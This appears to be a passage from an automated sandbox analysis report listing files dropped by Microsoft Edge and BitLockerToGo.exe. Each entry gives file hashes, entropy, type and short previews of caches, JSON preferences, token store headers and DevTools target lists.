                                                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:uriCache_
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.007961155602465
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXSxwvY:YWLSGTt1o9LuLgfGBPAzkVj/T8lCGA
                                                                                                                                                                                                                                                                                                                  MD5:334A0A4675DC6D863736C1A3A6F1D9EC
                                                                                                                                                                                                                                                                                                                  SHA1:383D7A18F5438ABABF666E121AB9EBBF631503F0
                                                                                                                                                                                                                                                                                                                  SHA-256:D1D9453426A502A1A41AA81320AD9F6C18DD8FA8FEA0D34AB42D46C07788D04B
                                                                                                                                                                                                                                                                                                                  SHA-512:FA7A136542045DB3BFDBF22C08B09D032694E752F55173109E29AE50B56C29C57D827D72953F89074382311116D583FDF108D95BF97D360E95044634E8C8917A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732301315430547}]}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                  MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                  SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                  SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                                  SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):44641
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.095733887872189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kL/LmZikZSwucDPb38JKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7ynUZEKoRTuiVIos
                                                                                                                                                                                                                                                                                                                  MD5:FDE831B66FCEC5E35605AAABC3BAF6E2
                                                                                                                                                                                                                                                                                                                  SHA1:8A5525F9F32358928242C4DCE0AE70F2AFA6D5E6
                                                                                                                                                                                                                                                                                                                  SHA-256:F4498C49327F153120A9950E1A86A37A8DCD020E19C0D2875D6A5A73091D02C7
                                                                                                                                                                                                                                                                                                                  SHA-512:DCEDD64C95F37DA9B78382B012481106D6E6C3D43C45B0ACF5D84719B2C9D60730E3E0D1F2CFE658DAE5A28142500EBDC7DE3AB38CCEF006984BF75A83C7480C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):46027
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088242508551804
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3MkbJrT8IeQcrQgxXSMLmZikZ8QUoD+PJ3xIAB3lWC1o/wWE7RTupzKscDX//Nq0:3Mk1rT8HRXIZahTWIo/oRTuiv
                                                                                                                                                                                                                                                                                                                  MD5:32D65C982E8C8D255AAF15F297AEDD24
                                                                                                                                                                                                                                                                                                                  SHA1:BDA247F9E42074600BDE4F0CECDFDC199C86CB15
                                                                                                                                                                                                                                                                                                                  SHA-256:DF3114275BCFBB2B3821F68D704120377E717D0DFED8095918583CB56E767925
                                                                                                                                                                                                                                                                                                                  SHA-512:88CEBECEEB8862CD89A1CC075014FD681C203673CF7BA17CEA1A3F969E03F209E970A5447A352578DC773A5A13A7EC02444AC3A8236A1ADB48F2FEBF32B2FD17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"67a26cfe-80a1-4053-b539-2c7a1a13978d"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8529679235276326
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxtxl9Il8ufVdeUJ+CxS7K3lmB1i+OC3d+kPd1rc:moY52UJbwWVmB1i+OC3d+h
                                                                                                                                                                                                                                                                                                                  MD5:2F302F522BACFF2F4DD233CEDD345220
                                                                                                                                                                                                                                                                                                                  SHA1:CC853AB9BE77D676C65CB6274CFDD176C74FF52D
                                                                                                                                                                                                                                                                                                                  SHA-256:EDC7AF4590C96B37F1CBECF8D969575D5C2E5F4CFC359CDE9861D46BACB7A73F
                                                                                                                                                                                                                                                                                                                  SHA-512:088AA15A951270F0E1C800773211BE588333C09DE1439C6FC05A4375F31BB76D4A7E165BAD1493E2A6BCC87878D0BE91EE57DEB5D08A922D0B1AF06C0E375457
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.B.6.V.0.S.w.8.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.n.s.q.h.a.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.000221175765321
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:xY5q5GbZwIkZoGPLWXHOREGuwqDcSGJwz9+:xvGbTkZo8KXsgwqHf+
                                                                                                                                                                                                                                                                                                                  MD5:58BE9C440FB5A6C5241D1BF068122533
                                                                                                                                                                                                                                                                                                                  SHA1:D4154375150765EC0039419657848027ABCFE033
                                                                                                                                                                                                                                                                                                                  SHA-256:86D19E0E509C316551E5B29B626A64082A9456CED20D96C3267848FADE032498
                                                                                                                                                                                                                                                                                                                  SHA-512:592538F73182E89653D3284FA1346EBC7BD6ACE356B1B5D33322D281F6F1E459526765E10DA446629AAF06CE1548C28ADDF22B46774A5710EE043EA4946379E4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.B.E.Z.t.y.Q.8.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.n.s.q.h.a.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9054035432478864
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xMxl9Il8uf7XuAghvQJ/7ITdj+9P0md/vc:aWY57X4pkTITR+9PQ
                                                                                                                                                                                                                                                                                                                  MD5:2877997F28D7EBFC3C52529DD2CB2B80
                                                                                                                                                                                                                                                                                                                  SHA1:382E07E73AB69102BF215E209D44EE269C39A39E
                                                                                                                                                                                                                                                                                                                  SHA-256:BB814501C537843B26228B9380D15AD7111480667B8EB9BB958B93F12C913647
                                                                                                                                                                                                                                                                                                                  SHA-512:0D6A2367723412ABC2D022EAC19E9250D208E716BE9C006B796DA9170C3AB9029EB8ABD22E93B13F014EA7B61635D9338E4ED17DB414BF8F255E83757E7AF1C5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".r.Z.P.Y.5.v.V.a.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.n.s.q.h.a.
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1267
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.376908478154887
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:OBfNaoCqYm/EINePKllDCqNBfNaoCHMtTMhBYpDCHMjBfNaoCNy0hyT1UCN8o1:SfNaoCbwETECcfNaoCsWKCsdfNaoCgL/
                                                                                                                                                                                                                                                                                                                  MD5:716AF03E88B4B360BFC26F0392DB7E2A
                                                                                                                                                                                                                                                                                                                  SHA1:0182997CB3A6E610B5832CDD6EAC2CBA543231A1
                                                                                                                                                                                                                                                                                                                  SHA-256:CAB4DB47A0D2B997923DC39DF2720DD74537C693CC37E8802D51DC3D4AD69066
                                                                                                                                                                                                                                                                                                                  SHA-512:606CCC5F0CF95E4162B76A4CDE16F9E1C13FE6B0535279B30F53FB308DDAAEDFBFA895FAF94E81857F899CA0411789BAD99BD72848773C37DD52317DAFD66CC0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/136890C3CB3C22B1F8F85A64F6F3244E",.. "id": "136890C3CB3C22B1F8F85A64F6F3244E",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/136890C3CB3C22B1F8F85A64F6F3244E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F1BE003B15A0CD641D77E0D8756383F0",.. "id": "F1BE003B15A0CD641D77E0D8756383F0",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F1BE003B15A0CD641D77E0D8756383F0"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4003600134759004
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:6NnCSHC2NnC8bCgNnCQ9CWNnCldgECWNnCDQ6yCDQVNnCsDCDNnCUwCpNnCERqRj:6NFN9NXN+dNbNbeNl3NrRqRDRl
                                                                                                                                                                                                                                                                                                                  MD5:A9181CF4D195139E093AE6E57EFD74D1
                                                                                                                                                                                                                                                                                                                  SHA1:5B2A69CD49DDE4DCC8FFA500204A0AD96F380081
                                                                                                                                                                                                                                                                                                                  SHA-256:A88812EB062CF61DF84B0523DDD63196CA23FF90450E3126BDFFA3845F0DA117
                                                                                                                                                                                                                                                                                                                  SHA-512:9C938BA398669F47778590074A25B35F7BF80FFE29D209E9D6921DF22C704506C85C0B4AEAC755C7F5DDC125658403D1A9476F99CAF45CEDFD60EEDB51BE29E4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A2A60B0EEA2A5D86E1EBCF387615E61D",.. "id": "A2A60B0EEA2A5D86E1EBCF387615E61D",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A2A60B0EEA2A5D86E1EBCF387615E61D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/8967B13CDFC13528FD69229073E78899",.. "id": "8967B13CDFC13528FD69229073E78899",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/8967B13CDFC13528FD69229073E78899"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1920x1080, components 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):261407
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.936690818812815
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:d5M6xLTOzxmsLGFj4Xwz+aASlmhxL4MSZ5fPl9k:d5M6dTOzo2X5Sox1U5l9k
                                                                                                                                                                                                                                                                                                                  MD5:8CE49C2A304876D50ADEB333B6D26474
                                                                                                                                                                                                                                                                                                                  SHA1:2D4126C8B8372E8F203DC6972F6D24F5392C5373
                                                                                                                                                                                                                                                                                                                  SHA-256:4FDBB021158861AB6D02ADE017AB6BD93C151FA97BC3FB491471E34D8798EA72
                                                                                                                                                                                                                                                                                                                  SHA-512:7123F730AC0DCAF5922F379940B164B1C8A73E403FED4072231D64FBC2D6F5A503B17E3A05EEA0A80100AC41CEA9A35F65C5BDF78EA6BF237D7BBF1E007F2BB2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b75a62fc-b0e7-2542-abb1-0cf1051812b8" xmpMM:DocumentID="xmp.did:C653DEED17A311EA8B5BD5250E05F029" xmpMM:InstanceID="xmp.iid:C653DEEC17A311EA8B5BD5250E05F029" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:39d3d013-cb07-b94a-9afe-3e232046b219" stRef:documentID="adobe:docid:photoshop:2052e8c3-076c-2b43-8d50-84f2df243b9c"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................O..............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
